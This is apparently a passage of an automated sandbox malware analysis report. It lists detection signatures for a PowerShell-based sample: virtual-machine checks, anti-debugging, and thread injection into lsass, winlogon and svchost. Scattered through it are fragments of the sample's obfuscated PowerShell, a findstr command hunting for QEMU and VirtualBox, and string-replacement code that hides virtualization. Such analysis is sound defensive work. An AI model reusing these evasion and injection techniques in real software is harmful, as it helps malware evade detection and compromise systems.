Source: svchost.exe, 00000035.00000000.2162013238.000002A76C164000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 0000002B.00000000.2078420703.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2573453748.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2086260407.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2097554251.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2563222103.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.2584284217.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2102410747.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2117344700.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2562685157.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.2580922407.000002A769A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZueKdEUUHiAXSCEDQYywxUjqjircvINglhjoFgCxNsHvopanXhowrjTfkOBVnSyZuuLKtpYKwb=tALLUSERSPROFILE=C:\ProgramDataanDsspKbaAOnvXJVRvGTkogjNLOjOiH=e('blck', '');APPDATA=C:\Users\user\AppData\RoamingatmPoAjKkGZcJzXyyUynWvzDHvk=ty.CryptographaUGORSbYAjGEewLJLAkjASOdO=ct blckSblckybaUMtCDXIBRyZfMXCSGPuCVEiFWmumVX=on qVeuI($eXEDAuUOsIvFTJiTqAZpvwNE=y.PaddingMode]AWVLTAfgiDypHXCDErXpLpMtvtCO=blckib
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys`
Source: svchost.exe, 00000031.00000000.2117097116.000001B94D400000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEECD80
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000002527DEE1E3C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE11D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 20_2_000002527DEE11D4
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEE84B0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002527DEE8814
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DF1CD80
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DF184B0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002527DF18814
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00000286D7D1CD80
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00000286D7D184B0
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_00000286D7D18814
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001D54783CD80
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D5478384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001D5478384B0
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D547838814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 40_2_000001D547838814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF0922CD80
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09228814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000001EF09228814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF092284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF092284B0
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF0942CD80
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09428814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000001EF09428814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF094284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF094284B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 43_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 44_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B9284B0
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B958814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 44_2_0000022F4B958814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B95CD80
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B9584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B9584B0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 45_2_00000262F1CD8814
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1CDCD80
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1CD84B0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 45_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1D084B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_0000023942B18814
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_000001EF05708814
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF057084B0

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 39.2.powershell.exe.1909cf124f8.12.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 39.2.powershell.exe.1908cbc0000.0.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 41_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: D10000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: F1CA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F1632EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 841B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E4192EBC
